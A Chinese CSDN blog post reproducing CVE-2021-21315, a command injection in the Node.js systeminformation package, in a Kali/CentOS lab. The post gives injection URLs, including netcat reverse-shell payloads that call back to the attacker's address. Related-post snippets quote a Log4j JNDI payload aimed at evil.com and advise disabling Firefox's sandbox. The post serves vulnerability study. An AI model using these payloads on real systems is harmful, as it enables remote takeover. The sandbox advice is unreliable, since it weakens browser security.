CVE-2021-21315漏洞复现

Aaron_Jㅤ

于 2024-08-19 15:53:30 发布

阅读量231

点赞数 8

文章标签：网络安全 web安全安全架构安全系统安全

本文链接：https://blog.csdn.net/weixin_57379923/article/details/141327468

版权

一、基本信息

攻击机：kali IP:192.168.100.60

靶机：CentOS7 IP:192.168.100.40

二、攻击过程

下载node.js环境

wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
mv nodejs/ /usr/local/sbin/
ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

进入指定目录

运行环境
在这里插入图片描述

浏览器测试

http://192.168.100.40:8000/api/getServices?name[]=$(echo -e 'zeeker' > test.txt)

测试结果
在这里插入图片描述

反弹shell

http://192.168.100.40:8000/api/getServices?name[]=$(nc -e /bin/bash 192.168.100.60 7777)

在这里插入图片描述

http://192.168.100.40:8000/api/getServices?name[]=$(nc 192.168.100.60 7777| /bin/bash | nc 
192.168.100.60 8888)

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Aaron_Jㅤ

关注关注

8
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
CVE-2021-21315漏洞复现

靶机：CentOS7 IP:192.168.100.40。攻击机：kali IP:192.168.100.60。下载node.js环境。
复制链接

扫一扫

CVE-2021-21315漏洞复现-kali2020.4

weixin_43867542的博客

07-19

1306

漏洞名称：systeminformation 操作系统命令注入漏洞等级危害：高危 CVSS评分：7.8 漏洞类型：操作系统命令注入漏洞概述 systeminformation中存在操作系统命令注入漏洞，该漏洞源于外部输入数据构造操作系统可执行命令过程中，网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...

CVE-2021-21315 NodeJs命令注入漏洞复现

wurisansheng的博客

10-11

1271

一、简介： Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能，每一个模块都包含非常丰富的函数，如http包含了和http相关的很多函数，帮助开发者对http、tcp、udp等进行操作或创建相关服务器。二、漏洞描述： Node.js-systeminformation是用于获取各种信息的Node.js模块，在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数注入payload执行系统

参与评论您还未登录，请先登录后发表或查看评论

CVE-2021-41773 漏洞复现

Jay17的博客

07-13

732

CVE-2021-41773 漏洞复现

CVE-2021-44228漏洞复现

m0_65764670的博客

05-29

1462

此漏洞为log4j2漏洞，log4j2是java语言的日志处理套件，使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似'${jndi:ldap://evil.com/example}'的参数进行JNDI注入，执行任意代码（注：Java环境1.8也可能会存在）什么是JNDI?

CVE-2021-40444漏洞复现

1ance's blog

09-25

3449

简介 MSHTML（又称Trident）是微软Windows操作系统Internet Explorer（IE）浏览器的排版组件。软件开发人员使用该组件，可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外，还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日，微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞，通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O

CVE-2021-3156 漏洞复现

wuuconix's blog

05-13

4138

CVE-2021-3156 漏洞复现漏洞描述这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时，它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时，实际上并未进行转义，从而可能导致缓冲区溢出。因此只要存在sudoers文件（通常是/etc/sudoers），攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权

CVE-2021-27928漏洞复现

wuuconix's blog

05-20

4124

CVE-2021-27928漏洞复现漏洞简介：它是一个MariaDB的远程命令执行漏洞，存在于10.2.37之前的10.2版本，10.3.28之前的10.3版本，10.4.18之前的10.4版本以及10.5.9之前的10.5版本。复现环境攻击机：Ubuntu 20.04.2 LTS 目标机：mariadb/server:10.3.13 docker容器复现准备我们需要在我们的攻击机上安装 metasploit-framework 框架。安装步骤见Nightly Installers

CVE-2021-21315

weixin_48300170的博客

07-19

2076

CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现漏洞简介漏洞信息环境搭建漏洞复现漏洞修复漏洞简介影响版本 Systeminformation < 5.3.1 漏洞信息漏洞名称漏洞编号危害等级 Linux sudoNode.js命令注入漏洞 CVE-2021-21315 高危 CVSS评分漏洞组件受影响版本 7.8

海康摄像头CVE-2021-36260漏洞复现

heike_Ch的博客

06-25

1025

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备，即使设备的所有者受限于有限的受保护 shell（psh）。除了入侵 IP摄像头外，还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互，攻击者只需要访问 http 或 HTTPS服务器端口（80/443）即可利用该漏洞，无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。

CVE-2021-4034漏洞复现

热门推荐

weixin_42618425的博客

01-26

2万+

CVE-2021-4034漏洞复现 CVE-2021-4034漏洞描述最近网上公开了CVE-2021-4034漏洞详情，该漏洞主要是由于 Linux 下 Polkit 工具集的本地权限提升漏洞，任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。影响范围影响版本：由于 polkit 为系统预装工具，目前主流Linux版本均受影响。修复版本： CentOS系列： CentOS 6：polkit-0.96-11.el6_10.2 CentOS 7：polkit-0.112-26.el

CVE-2021-21315-PoC：CVE 2021-21315 PoC

03-03

CVE-2021-21315系统信息这是的概念证明，它影响到的系统信息库（npm程序包“ systeminformation”）。 “请务必检查或清理传递给si.inetLatency（），si.inetChecksite（），si.services（），si.processLoad（）的...

检测通过“ proxylogon”组漏洞（CVE-2021-26855，CVE-2021-26857，CVE-2021-26858，CVE-2021-27065）利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发

05-27

预认证SSRF，CVSS：3.0 9.1 / 8.4 CVE-2021-26857，不安全的反序列化导致特权升级到SYSTEM级别，CVSS：3.0 7.8 / 7.2 CVE-2021-26858，认证后文件写入， CVSS：3.0 7.8 / 7.2 CVE-2021-27065，认证后文件写入，CVSS...

CVE-2021-25735:利用CVE-2021-25735

05-14

CVE-2021-25735 利用CVE-2021-25735：Kubernetes验证准入Webhook绕过设置脆弱的环境让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器，您需要在本地构建Docker容器映像...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8395

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

怎么在网络攻击中屹立不倒

dexun123的博客

08-12

880

在当今蓬勃发展的网络游戏产业中，服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS（分布式拒绝服务）与CC（挑战碰撞）攻击威胁，游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器，游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验，以抵御外部侵扰，确保玩家沉浸于无缝的游戏世界。

【安全工具推荐-Search_Viewer资产测绘】

qq_55213436的博客

08-14

209

Search_Viewer，集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具，支持一键采集爬取和导出fofa、shodan等数据，方便快捷查看。包含语法帮助手册，忘记查询语法也能方便查看语法，渗透不二之选。

入门网络安全工程师要学习哪些内容

最新发布

白帽子佳奇的博客

08-18

1181

大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对还是不了解，不知道需要学什么?知了堂小编总结出以下要点。是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和不一样，如果你想成为安全开发工程师，学的侧重点就和安全不一样。学的东西很泛，但选定方向就简单了。大致的学习流程总结就是：网络基础、操作系统、中间件、数据库。其中电脑基础：像系统Windows基础和Linux基础、HTML基础、代码JS基础等。

cve-2021-3618漏洞复现

02-06

CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞的复现步骤如下： 1. 首先，你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本，因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中，打开一个新的标签页，并输入“about:config”（不包括引号）并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”（不包括引号），然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”（不包括引号）。这将禁用Firefox的内容沙箱。请注意，这将降低浏览器的安全性，请谨慎操作。 5. 关闭并重新启动Firefox浏览器，使更改生效。 6. 现在，你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站，如已知的恶意或受攻击的网站，或使用特定的payload触发漏洞。 7. 如果复现成功，可能会出现安全漏洞所导致的异常行为，比如系统崩溃、恶意代码执行等。如果没有出现异常行为，可能是因为已经修复了该漏洞或在你的环境中无法成功利用。需要注意的是，复现CVE漏洞可能存在风险，并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士，不推荐普通用户进行尝试。实施复现操作之前，请确认你已经了解并接受相关风险。